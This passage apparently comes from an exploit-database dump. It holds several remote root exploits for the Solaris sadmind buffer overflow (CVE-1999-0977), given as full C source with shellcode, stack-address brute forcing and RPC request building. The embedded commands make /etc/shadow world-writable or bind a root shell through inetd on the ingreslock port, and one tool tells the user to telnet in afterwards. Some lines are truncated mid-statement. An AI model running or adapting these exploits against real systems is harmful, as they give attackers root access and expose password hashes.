&objp->version))\r\n\treturn (FALSE);\r\n if (!xdr_nm_send_arg_string(xdrs, &objp->string))\r\n\treturn (FALSE);\r\n if (!xdr_nm_send_arg_int(xdrs, &objp->fence))\r\n\treturn (FALSE);\r\n if (!xdr_nm_send_footer(xdrs, &objp->footer))\r\n\treturn (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t\r\nxdr_nm_reply(XDR *xdrs, struct nm_reply *objp)\r\n{\r\n if (!xdr_u_int(xdrs, &objp->uint1))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint2))\r\n\treturn (FALSE);\r\n if (!xdr_wrapstring(xdrs, &objp->string1))\r\n\treturn (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nint\r\nmain(int argc, char *argv[])\r\n{\r\n CLIENT *cl;\r\n struct nm_send send;\r\n struct nm_reply reply;\r\n struct timeval tm;\r\n enum clnt_stat stat;\r\n int c, i, len, slen, clen;\r\n char *program, *cp, buf[BUFLEN+1];\r\n char *hostname, *command;\r\n int offset, alignment, pinging = 0;\r\n unsigned long int sp = 0, fp, addr;\r\n\r\n program = argv[0];\r\n hostname = \"localhost\";\r\n command = \"chmod 666 /etc/shadow\";\r\n offset = OFFSET; alignment = ALIGNMENT;\r\n while ((c = getopt(argc, argv, \"h:c:s:o:a:p\")) != EOF) {\r\n\tswitch (c) {\r\n\tcase 'h':\r\n\t hostname = optarg;\r\n\t break;\r\n\tcase 'c':\r\n\t command = optarg; \r\n\t break;\r\n\tcase 's':\r\n\t sp = strtoul(optarg, NULL, 0);\r\n\t break;\r\n\tcase 'o':\r\n\t offset = (int) strtol(optarg, NULL, 0);\r\n\t break;\r\n\tcase 'a':\r\n\t alignment = (int) strtol(optarg, NULL, 0);\r\n\t break;\r\n\tcase 'p':\r\n\t pinging = 1;\r\n\t break;\r\n\tdefault:\r\n\t fprintf(stderr, \"usage: %s -h hostname -c command -s sp \"\r\n\t\t \"[-o offset] [-a alignment] [-p]\\n\", program);\r\n\t exit(1);\r\n\t break;\r\n\t}\r\n }\r\n memset(buf, '\\xff', BUFLEN);\r\n fp = sp + FRAMELEN1 + FRAMELEN2; fp &= 0xfffffff8;\r\n addr = sp + offset; addr &= 0xfffffffc;\r\n for (i = 0, cp = buf + alignment; i < ADDRLEN / 8; i++) {\r\n\t*cp++ = (fp >> 24) & 0xff;\r\n\t*cp++ = (fp >> 16) & 0xff;\r\n\t*cp++ = (fp >> 8) & 0xff;\r\n\t*cp++ = (fp >> 0) & 0xff;\r\n\t*cp++ = (addr >> 24) & 0xff;\r\n\t*cp++ = (addr >> 16) & 0xff;\r\n\t*cp++ = (addr >> 8) & 0xff;\r\n\t*cp++ = (addr >> 0) & 0xff;\r\n }\r\n slen = strlen(shell); clen = strlen(command);\r\n len = BUFLEN - 1 - clen - slen - ADDRLEN - alignment; len &= 0xfffffffc;\r\n for (i = 0; i < len / 4; i++) {\r\n\t*cp++ = (NOP >> 24) & 0xff;\r\n\t*cp++ = (NOP >> 16) & 0xff;\r\n\t*cp++ = (NOP >> 8) & 0xff;\r\n\t*cp++ = (NOP >> 0) & 0xff;\r\n }\r\n len = clen; len++; len = -len;\r\n shell[LEN+0] = (len >> 24) & 0xff;\r\n shell[LEN+1] = (len >> 16) & 0xff;\r\n shell[LEN+2] = (len >> 8) & 0xff;\r\n shell[LEN+3] = (len >> 0) & 0xff;\r\n memcpy(cp, shell, slen); cp += slen;\r\n memcpy(cp, command, clen);\r\n buf[BUFLEN] = '\\0';\r\n memset(&send, 0, sizeof(struct nm_send));\r\n send.header.uint2 = NETMGT_HEADER_TYPE;\r\n send.header.string1 = \"\";\r\n send.header.string2 = \"\";\r\n send.header.string3 = \"\";\r\n send.header.uint7 =\r\n\tstrlen(ADM_FW_VERSION) + 1 +\r\n\t(4 * sizeof(unsigned int)) + sizeof(int) +\r\n\tstrlen(ADM_CLIENT_DOMAIN) + 1 +\r\n\t(4 * sizeof(unsigned int)) + strlen(buf) + 1 +\r\n\tstrlen(ADM_FENCE) + 1 +\r\n\t(4 * sizeof(unsigned int)) + sizeof(int) +\r\n\tstrlen(NETMGT_ENDOFARGS) + 1;\r\n send.version.string1 = ADM_FW_VERSION;\r\n send.version.uint1 = NETMGT_ARG_INT;\r\n send.version.uint2 = sizeof(int);\r\n send.version.int1 = 1;\r\n send.string.string1 = ADM_CLIENT_DOMAIN;\r\n send.string.uint1 = NETMGT_ARG_STRING;\r\n send.string.uint2 = strlen(buf);\r\n send.string.string2 = buf;\r\n send.fence.string1 = ADM_FENCE;\r\n send.fence.uint1 = NETMGT_ARG_INT;\r\n send.fence.uint2 = sizeof(int);\r\n send.fence.int1 = 666;\r\n send.footer.string1 = NETMGT_ENDOFARGS;\r\n cl = clnt_create(hostname, NETMGT_PROG, NETMGT_VERS, \"udp\");\r\n if (cl == NULL) {\r\n\tclnt_pcreateerror(\"clnt_create\");\r\n\texit(1);\r\n }\r\n cl->cl_auth = authunix_create(\"localhost\", 0, 0, 0, NULL);\r\n if (!pinging) {\r\n\tfprintf(stdout,\r\n\t\t\"%%sp 0x%08lx offset %d --> return address 0x%08lx [%d]\\n\",\r\n\t\tsp, offset, addr, alignment);\r\n\tfprintf(stdout,\r\n\t\t\"%%sp 0x%08lx with frame length %d --> %%fp 0x%08lx\\n\",\r\n\t\tsp, FRAMELEN1 + FRAMELEN2, fp);\r\n\ttm.tv_sec = NETMGT_UDP_SERVICE_TIMEOUT; tm.tv_usec = 0;\r\n\tif (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm)) {\r\n\t fprintf(stderr, \"exploit failed; unable to set timeout\\n\");\r\n\t exit(1);\r\n\t}\r\n\ttm.tv_sec = NETMGT_UDP_SERVICE_RETRY_TIMEOUT; tm.tv_usec = 0;\r\n\tif (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm)) {\r\n\t fprintf(stderr, \"exploit failed; unable to set timeout\\n\");\r\n\t exit(1);\r\n\t}\r\n\tstat = clnt_call(cl, NETMGT_PROC_SERVICE,\r\n\t\t\t xdr_nm_send, (caddr_t) &send,\r\n\t\t\t xdr_nm_reply, (caddr_t) &reply, tm);\r\n\tif (stat != RPC_SUCCESS) {\r\n\t clnt_perror(cl, \"clnt_call\");\r\n\t fprintf(stdout, \"now check if exploit worked; \"\r\n\t\t \"RPC failure was expected\\n\");\r\n\t exit(0);\r\n\t}\r\n\tfprintf(stderr, \"exploit failed; \"\r\n\t\t\"RPC succeeded and returned { %u, %u, \\\"%s\\\" }\\n\",\r\n\t\treply.uint1, reply.uint2, reply.string1);\r\n\tclnt_destroy(cl);\r\n\texit(1);\r\n } else {\r\n\ttm.tv_sec = NETMGT_UDP_PING_TIMEOUT; tm.tv_usec = 0;\r\n\tif (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm)) {\r\n\t fprintf(stderr, \"exploit failed; unable to set timeout\\n\");\r\n\t exit(1);\r\n\t}\r\n\ttm.tv_sec = NETMGT_UDP_PING_RETRY_TIMEOUT; tm.tv_usec = 0;\r\n\tif (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm)) {\r\n\t fprintf(stderr, \"exploit failed; unable to set timeout\\n\");\r\n\t exit(1);\r\n\t}\r\n\tstat = clnt_call(cl, NETMGT_PROC_PING,\r\n\t\t\t xdr_void, NULL,\r\n\t\t\t xdr_void, NULL, tm);\r\n\tif (stat != RPC_SUCCESS) {\r\n\t clnt_perror(cl, \"clnt_call\");\r\n\t exit(1);\r\n\t}\r\n\tclnt_destroy(cl);\r\n\texit(0);\r\n }\r\n}\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19668/"}, {"lastseen": "2016-02-02T12:24:55", "description": "Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability (3). CVE-1999-0977. Remote exploit for solaris platform", "published": "2000-11-10T00:00:00", "type": "exploitdb", "title": "Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability 3", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0977"], "modified": "2000-11-10T00:00:00", "id": "EDB-ID:19670", "href": "https://www.exploit-db.com/exploits/19670/", "sourceData": "source: http://www.securityfocus.com/bid/866/info\r\n \r\nCertain versions of Solaris ship with a version of sadmind which is vulnerable to a remotely exploitable buffer overflow attack. sadmind is the daemon used by Solstice AdminSuite applications to perform distributed system administration operations such as adding users. The sadmind daemon is started automatically by the inetd daemon whenever a request to invoke an operation is received.\r\n \r\nUnder vulnerable versions of sadmind (2.6 and 7.0 have been tested), if a long buffer is passed to a NETMGT_PROC_SERVICE request (called via clnt_call()), it is possible to overwrite the stack pointer and execute arbitrary code. The actual buffer in questions appears to hold the client's domain name. The overflow in sadmind takes place in the get_auth() function, part of the /usr/snadm/lib/libmagt.so.2 library. Because sadmind runs as root any code launched as a result will run as with root privileges, therefore resulting in a root compromise. \r\n\r\n// *** Synnergy Networks\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <signal.h>\r\n#include <string.h>\r\n#include <sys/errno.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n#include <unistd.h>\r\n\r\n/* *** ATTENTION *** you may have to change some\r\nof these *** ATTENTION *** */\r\n#define EXPX86 \"sadmindex-x86\" /*\r\nsadmind exploit for x86 arch */\r\n#define EXPSPARC \"sadmindex-sparc\" /*\r\nsadmind exploit for sparc arch */\r\n#define INC 4 /* sp brute forcing\r\nincrementation - 4 should be ok\r\n\r\n/* DON'T change the following */\r\n#define FALSE 0 /* false */\r\n#define TRUE !FALSE /* true */\r\n#define BINDINGRES \"echo 'ingreslock stream\r\ntcp nowait root /bin/sh sh -i'\r\n > /tmp/.x;\r\n/usr/sbin/inetd -s /tmp/.x;\r\n m -f\r\n/tmp/.x;\" /* bind rootshell */\r\n#define SPX8626 0x080418ec /* default\r\nsadmindex sp for x86 2.6 */\r\n#define SPX867 0x08041798 /* default\r\nsadmindex sp for x86 7.0 */\r\n#define SPSPARC26 0xefff9580 /* default\r\nsadmindex sp for sparc 2.6 */\r\n#define SPSPARC7 0xefff9418 /* default\r\nsadmindex sp for sparc 7.0 */\r\n#define EXPCMDX8626 \"./%s -h %s -c \\\"%s\\\" -s\r\n0x%x -j 512\\n\" /* cmd line */\r\n#define EXPCMDX867 \"./%s -h %s -c \\\"%s\\\" -s\r\n0x%x -j 536\\n\" /* cmd line */\r\n#define EXPCMDSPARC \"./%s -h %s -c \\\"%s\\\" -s\r\n0x%x\\n\" /* cmd line */\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n int i, sockfd, fd, size = 4096, sign = -1;\r\n long int addr;\r\n char *buffer = (char *) malloc (size);\r\n struct hostent *he;\r\n struct sockaddr_in their_addr;\r\n if (argc < 3)\r\n {\r\n fprintf(stderr, \"\\nsadmindex sp\r\nbrute forcer - by elux\\n\");\r\n fprintf(stderr, \"usage: %s [arch]\r\n<host>\\n\\n\", argv[0]);\r\n fprintf(stderr, \"\\tarch:\\n\");\r\n fprintf(stderr, \"\\t1 - x86 Solaris\r\n2.6\\n\");\r\n fprintf(stderr, \"\\t2 - x86 Solaris\r\n7.0\\n\");\r\n fprintf(stderr, \"\\t3 - SPARC\r\nSolaris 2.6\\n\");\r\n fprintf(stderr, \"\\t4 - SPARC\r\nSolaris 7.0\\n\\n\");\r\n exit(TRUE);\r\n }\r\n\r\n if ( (he = gethostbyname(argv[2])) ==\r\nNULL)\r\n {\r\n printf(\"Unable to resolve %s\\n\",\r\nargv[2]);\r\n exit(TRUE);\r\n }\r\n\r\n their_addr.sin_family = AF_INET;\r\n their_addr.sin_port = htons(1524);\r\n their_addr.sin_addr = *((struct in_addr\r\n*)he->h_addr);\r\n bzero(&(their_addr.sin_zero), 8);\r\n\r\n if ( (strcmp(argv[1], \"1\")) == 0)\r\n {\r\n addr = SPX8626;\r\n printf(\"\\nAlright... sit back and\r\nrelax while this program brut\r\n for (i = 0; i <= 4096; i += INC)\r\n {\r\n if ( (sockfd =\r\nsocket(AF_INET, SOCK_STREAM, 0)) != -1)\r\n {\r\n if (\r\n(connect(sockfd, (struct sockaddr *)&their\r\n {\r\n \r\nfprintf(stderr, \"\\n\\nNow telnet to %s,\r\n \r\nclose(sockfd);\r\n \r\nexit(FALSE);\r\n }\r\n }\r\n if ( (fd = open(EXPX86,\r\nO_RDONLY)) != -1)\r\n {\r\n sign *= -1;\r\n addr -= i *sign;\r\n snprintf(buffer,\r\nsize, EXPCMDX8626, EXPX86, arg\r\n system(buffer);\r\n }\r\n else\r\n {\r\n printf(\"\\n\\n%s\r\ndoesn't exisit, you need the sad\r\n exit(TRUE);\r\n }\r\n }\r\n }\r\n else if ( (strcmp(argv[1], \"2\")) == 0)\r\n {\r\n addr = SPX867;\r\n printf(\"\\nAlright... sit back and\r\nrelax while this program brut\r\n for (i = 0; i <= 4096; i += INC)\r\n {\r\n if ( (sockfd =\r\nsocket(AF_INET, SOCK_STREAM, 0)) != -1)\r\n {\r\n if (\r\n(connect(sockfd, (struct sockaddr *)&their\r\n {\r\n \r\nfprintf(stderr, \"\\n\\nNow telnet to %s,\r\n \r\nclose(sockfd);\r\n \r\nexit(FALSE);\r\n }\r\n }\r\n if ( (fd = open(EXPX86,\r\nO_RDONLY)) != -1)\r\n {\r\n\r\n\r\n sign *= -1;\r\n addr -= i *sign;\r\n snprintf(buffer,\r\nsize, EXPCMDX867, EXPX86, argv\r\n system(buffer);\r\n }\r\n else\r\n {\r\n printf(\"\\n\\n%s\r\ndoesn't exisit, you need the sad\r\n exit(TRUE);\r\n }\r\n }\r\n }\r\n else if ( (strcmp(argv[1], \"3\")) == 0)\r\n {\r\n addr = SPSPARC26;\r\n printf(\"\\nAlright... sit back and\r\nrelax while this program brut\r\n for (i = 0; i <= 4096; i += INC)\r\n {\r\n if ( (sockfd =\r\nsocket(AF_INET, SOCK_STREAM, 0)) != -1)\r\n {\r\n if (\r\n(connect(sockfd, (struct sockaddr *)&their\r\n {\r\n \r\nfprintf(stderr, \"\\n\\nNow telnet to %s,\r\n close(sockfd);\r\n \r\nexit(FALSE);\r\n }\r\n }\r\n if ( (fd = open(EXPSPARC,\r\nO_RDONLY)) != -1)\r\n {\r\n sign *= -1;\r\n addr -= i *sign;\r\n snprintf(buffer,\r\nsize, EXPCMDSPARC, EXPSPARC, a\r\n system(buffer);\r\n }\r\n else\r\n {\r\n printf(\"\\n\\n%s\r\ndoesn't exisit, you need the sad\r\n exit(TRUE);\r\n }\r\n }\r\n }\r\n else if ( (strcmp(argv[1], \"4\")) == 0)\r\n {\r\n addr = SPSPARC7; \r\n printf(\"\\nAlright... sit back and\r\nrelax while this program brut\r\n for (i = 0; i <= 4096; i += INC)\r\n {\r\n if ( (sockfd =\r\nsocket(AF_INET, SOCK_STREAM, 0)) != -1)\r\n {\r\n if (\r\n(connect(sockfd, (struct sockaddr *)&their\r\n { \r\n \r\nfprintf(stderr, \"\\n\\nNow telnet to %s,\r\n \r\nclose(sockfd);\r\n \r\nexit(FALSE);\r\n } \r\n }\r\n if ( (fd = open(EXPSPARC,\r\nO_RDONLY)) != -1)\r\n {\r\n sign *= -1;\r\n addr -= i *sign;\r\n snprintf(buffer,\r\nsize, EXPCMDSPARC, EXPSPARC, a\r\n system(buffer);\r\n }\r\n else\r\n {\r\n printf(\"\\n\\n%s\r\ndoesn't exisit, you need the sad\r\n exit(TRUE);\r\n }\r\n }\r\n\r\n }\r\n else\r\n printf(\"%s is not a supported\r\narch, try 1 - 4 ... .. .\\n\", argv\r\n}\r\n\r\n// EOF\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19670/"}, {"lastseen": "2016-02-02T12:25:09", "description": "Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability (4). CVE-1999-0977. Remote exploit for solaris platform", "published": "1999-12-10T00:00:00", "type": "exploitdb", "title": "Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability 4", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0977"], "modified": "1999-12-10T00:00:00", "id": "EDB-ID:19672", "href": "https://www.exploit-db.com/exploits/19672/", "sourceData": "source: http://www.securityfocus.com/bid/866/info\r\n \r\nCertain versions of Solaris ship with a version of sadmind which is vulnerable to a remotely exploitable buffer overflow attack. sadmind is the daemon used by Solstice AdminSuite applications to perform distributed system administration operations such as adding users. The sadmind daemon is started automatically by the inetd daemon whenever a request to invoke an operation is received.\r\n \r\nUnder vulnerable versions of sadmind (2.6 and 7.0 have been tested), if a long buffer is passed to a NETMGT_PROC_SERVICE request (called via clnt_call()), it is possible to overwrite the stack pointer and execute arbitrary code. The actual buffer in questions appears to hold the client's domain name. The overflow in sadmind takes place in the get_auth() function, part of the /usr/snadm/lib/libmagt.so.2 library. Because sadmind runs as root any code launched as a result will run as with root privileges, therefore resulting in a root compromise. \r\n\r\n/*************************************************************************\\\r\n** **\r\n** Super Solaris sadmin Exploit - Based on sadminex by Cheez Whiz **\r\n** by optyx <optyx@uberhax0r.net> **\r\n** based on sadminsparc. and sadminx86.c by Cheez Whiz **\r\n** **\r\n\\*************************************************************************/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <rpc/rpc.h>\r\n\r\nchar shellsparc[] = \"\\x20\\xbf\\xff\\xff\\x20\\xbf\\xff\\xff\\x7f\\xff\\xff\\xff\"\r\n\t\t \"\\x90\\x03\\xe0\\x5c\\x92\\x22\\x20\\x10\\x94\\x1b\\xc0\\x0f\"\r\n\t\t \"\\xec\\x02\\x3f\\xf0\\xac\\x22\\x80\\x16\\xae\\x02\\x60\\x10\"\r\n\t\t \"\\xee\\x22\\x3f\\xf0\\xae\\x05\\xe0\\x08\\xc0\\x2d\\xff\\xff\"\r\n\t\t \"\\xee\\x22\\x3f\\xf4\\xae\\x05\\xe0\\x03\\xc0\\x2d\\xff\\xff\"\r\n\t\t \"\\xee\\x22\\x3f\\xf8\\xae\\x05\\xc0\\x16\\xc0\\x2d\\xff\\xff\"\r\n\t\t \"\\xc0\\x22\\x3f\\xfc\\x82\\x10\\x20\\x3b\\x91\\xd0\\x20\\x08\"\r\n\t\t \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"\r\n\t\t \"\\xff\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\xff\"\r\n\t\t \"\\x2d\\x63\\xff\";\r\n\r\nchar shellx86[] = \"\\xeb\\x45\\x9a\\xff\\xff\\xff\\xff\\x07\\xff\\xc3\\x5e\\x31\"\r\n\t\t \"\\xc0\\x89\\x46\\xb7\\x88\\x46\\xbc\\x31\\xc0\\x50\\x56\\x8b\"\r\n\t\t \"\\x1e\\xf7\\xdb\\x89\\xf7\\x83\\xc7\\x10\\x57\\x89\\x3e\\x83\"\r\n\t\t \"\\xc7\\x08\\x88\\x47\\xff\\x89\\x7e\\x04\\x83\\xc7\\x03\\x88\"\r\n\t\t \"\\x47\\xff\\x89\\x7e\\x08\\x01\\xdf\\x88\\x47\\xff\\x89\\x46\"\r\n\t\t \"\\x0c\\xb0\\x3b\\xe8\\xbe\\xff\\xff\\xff\\x83\\xc4\\x0c\\xe8\"\r\n\t\t \"\\xbe\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"\r\n\t\t \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\"\r\n\t\t \"\\x2f\\x73\\x68\\xff\\x2d\\x63\\xff\";\r\n\t\t \r\n\r\nint buflen[]\t = { 1076, 1056 };\r\nint addrlen[] \t = { 560, 8 };\r\nint lens[]\t = { 84, 76 };\r\nint offset[]\t = { 688, 572 };\r\nint alignment[]\t = { 4, 0 };\r\nlong int nops[]\t = { 0x801bc00f, 0x90 };\r\nint junks[]\t = { 512, 536 };\r\nchar command[] \t = \"echo 'ingreslock stream tcp nowait root /bin/sh sh -i' \"\r\n\t \"> /tmp/.x; /usr/sbin/inetd -s /tmp/.x; rm -f /tmp/.x;\";\r\nunsigned long int sp[]\t= { 0xefff9580, 0xefff9418, 0x080418ec, 0x08041798 };\r\n \r\n#define FRAMELEN1 608\r\n#define FRAMELEN2 4200\r\n\r\n#define NETMGT_PROG 100232\r\n#define NETMGT_VERS 10\r\n#define NETMGT_PROC_PING 0\r\n#define NETMGT_PROC_SERVICE 1\r\n\r\n#define NETMGT_UDP_PING_TIMEOUT 30\r\n#define NETMGT_UDP_PING_RETRY_TIMEOUT 5\r\n#define NETMGT_UDP_SERVICE_TIMEOUT 1\r\n#define NETMGT_UDP_SERVICE_RETRY_TIMEOUT 2\r\n\r\n#define NETMGT_HEADER_TYPE 6\r\n#define NETMGT_ARG_INT 3\r\n#define NETMGT_ARG_STRING 9\r\n#define NETMGT_ENDOFARGS \"netmgt_endofargs\"\r\n\r\n#define FW_VERSION \"VERSION\"\r\n#define CLIENT_DOMAIN \"CLIENT_DOMAIN\"\r\n#define FENCE \"FENCE\"\r\n\r\nstruct nm_send_header {\r\n\tstruct timeval timeval1;\r\n\tstruct timeval timeval2;\r\n\tstruct timeval timeval3;\r\n\tunsigned int uint1;\r\n\tunsigned int uint2;\r\n\tunsigned int uint3;\r\n\tunsigned int uint4;\r\n\tunsigned int uint5;\r\n\tstruct in_addr inaddr1;\r\n\tstruct in_addr inaddr2;\r\n\tunsigned long ulong1;\r\n\tunsigned long ulong2;\r\n\tstruct in_addr inaddr3;\r\n\tunsigned long ulong3;\r\n\tunsigned long ulong4;\r\n\tunsigned long ulong5;\r\n\tstruct timeval timeval4;\r\n\tunsigned int uint6;\r\n\tstruct timeval timeval5;\r\n\tchar *string1;\r\n\tchar *string2;\r\n\tchar *string3;\r\n\tunsigned int uint7;\r\n};\r\n\r\nstruct nm_send_arg_int {\r\n\tchar *string1;\r\n\tunsigned int uint1;\r\n\tunsigned int uint2;\r\n\tint int1;\r\n\tunsigned int uint3;\r\n\tunsigned int uint4;\r\n};\r\n\r\nstruct nm_send_arg_string {\r\n\tchar *string1;\r\n\tunsigned int uint1;\r\n\tunsigned int uint2;\r\n\tchar *string2;\r\n\tunsigned int uint3;\r\n\tunsigned int uint4;\r\n};\r\n\r\nstruct nm_send_footer {\r\n\tchar *string1;\r\n};\r\n\r\nstruct nm_send {\r\n\tstruct nm_send_header header;\r\n\tstruct nm_send_arg_int version;\r\n\tstruct nm_send_arg_string string;\r\n\tstruct nm_send_arg_int fence;\r\n\tstruct nm_send_footer footer;\r\n};\r\n\r\nstruct nm_reply {\r\n\tunsigned int uint1;\r\n\tunsigned int uint2;\r\n\tchar *string1;\r\n};\r\n\r\nbool_t xdr_nm_send_header(XDR *xdrs, struct nm_send_header *objp)\r\n{\r\n\tchar *addr;\r\n\tsize_t size = sizeof(struct in_addr);\r\n\r\n\tif(!xdr_long(xdrs, &objp->timeval1.tv_sec))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_long(xdrs, &objp->timeval1.tv_usec))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_long(xdrs, &objp->timeval2.tv_sec))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_long(xdrs, &objp->timeval2.tv_usec))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_long(xdrs, &objp->timeval3.tv_sec))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_long(xdrs, &objp->timeval3.tv_usec))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint1))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint2))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint3))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint4))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint5))\r\n\t\treturn (FALSE);\r\n\taddr = (char *) &objp->inaddr1.s_addr;\r\n\tif(!xdr_bytes(xdrs, &addr, &size, size))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_long(xdrs, &objp->ulong1))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_long(xdrs, &objp->ulong2))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_long(xdrs, &objp->ulong3))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_long(xdrs, &objp->ulong4))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_long(xdrs, &objp->ulong5))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_long(xdrs, &objp->timeval4.tv_sec))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_long(xdrs, &objp->timeval4.tv_usec))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint6))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_long(xdrs, &objp->timeval5.tv_sec))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_long(xdrs, &objp->timeval5.tv_usec))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_wrapstring(xdrs, &objp->string1))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_wrapstring(xdrs, &objp->string2))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_wrapstring(xdrs, &objp->string3))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint7))\r\n\t\treturn (FALSE);\r\n\treturn (TRUE);\r\n}\r\n\r\nbool_t xdr_nm_send_arg_int(XDR *xdrs, struct nm_send_arg_int *objp)\r\n{\r\n\tif(!xdr_wrapstring(xdrs, &objp->string1))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint1))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint2))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_int(xdrs, &objp->int1))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint3))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint4))\r\n\t\treturn (FALSE);\r\n\treturn (TRUE);\r\n}\r\n\r\nbool_t xdr_nm_send_arg_string(XDR *xdrs, struct nm_send_arg_string *objp)\r\n{\r\n\tif(!xdr_wrapstring(xdrs, &objp->string1))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint1))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint2))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_wrapstring(xdrs, &objp->string2))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint3))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint4))\r\n\t\treturn (FALSE);\r\n\treturn (TRUE);\r\n}\r\n\r\nbool_t xdr_nm_send_footer(XDR *xdrs, struct nm_send_footer *objp)\r\n{\r\n\tif(!xdr_wrapstring(xdrs, &objp->string1))\r\n\t\treturn (FALSE);\r\n\treturn (TRUE);\r\n}\r\n\r\nbool_t xdr_nm_send(XDR *xdrs, struct nm_send *objp)\r\n{\r\n\tif(!xdr_nm_send_header(xdrs, &objp->header))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_nm_send_arg_int(xdrs, &objp->version))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_nm_send_arg_string(xdrs, &objp->string))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_nm_send_arg_int(xdrs, &objp->fence))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_nm_send_footer(xdrs, &objp->footer))\r\n\t\treturn (FALSE);\r\n\treturn (TRUE);\r\n}\r\n\r\nbool_t xdr_nm_reply(XDR *xdrs, struct nm_reply *objp)\r\n{\r\n\tif(!xdr_u_int(xdrs, &objp->uint1))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_u_int(xdrs, &objp->uint2))\r\n\t\treturn (FALSE);\r\n\tif(!xdr_wrapstring(xdrs, &objp->string1))\r\n\t\treturn (FALSE);\r\n\treturn (TRUE);\r\n}\r\n\r\nvoid usage(char *prog)\r\n{\r\n\tfprintf(stderr, \"usage: %s -t target -a arch [-s size]\", prog);\r\n\tfprintf(stderr, \" [-i increment] [-p]\\n\");\r\n\tfprintf(stderr, \"\\tarchitectures:\\n\");\r\n\tfprintf(stderr, \"\\t0 - Solaris SPARC 2.6\\n\");\r\n\tfprintf(stderr, \"\\t1 - Solaris SPARC 2.7 (7.0)\\n\");\r\n\tfprintf(stderr, \"\\t2 - Solaris x86 2.6\\n\");\r\n\tfprintf(stderr, \"\\t3 - Solaris x86 2.7 (7.0)\\n\\n\");\r\n\r\n\texit(-1);\t\r\n}\r\n\r\nint exp(char *host, int arch, unsigned long int sp, int pinging)\r\n{\r\n\tCLIENT *cl;\r\n\tstruct nm_send send;\r\n\tstruct nm_reply reply;\r\n\tstruct timeval tm;\r\n\tenum clnt_stat stat;\r\n\tint c, i, len, slen, clen, junk, a;\r\n\tchar *cp, *buf;\r\n\tunsigned long int addr, fp;\r\n\t\r\n\ta = (int) arch / 2;\t\r\n\tbuf = (char *) malloc(buflen[a] + 1);\r\n\r\n\tif(a)\r\n\t{\r\n\t\t/* Solaris x86 */\r\n\t\tmemset(buf, nops[a], 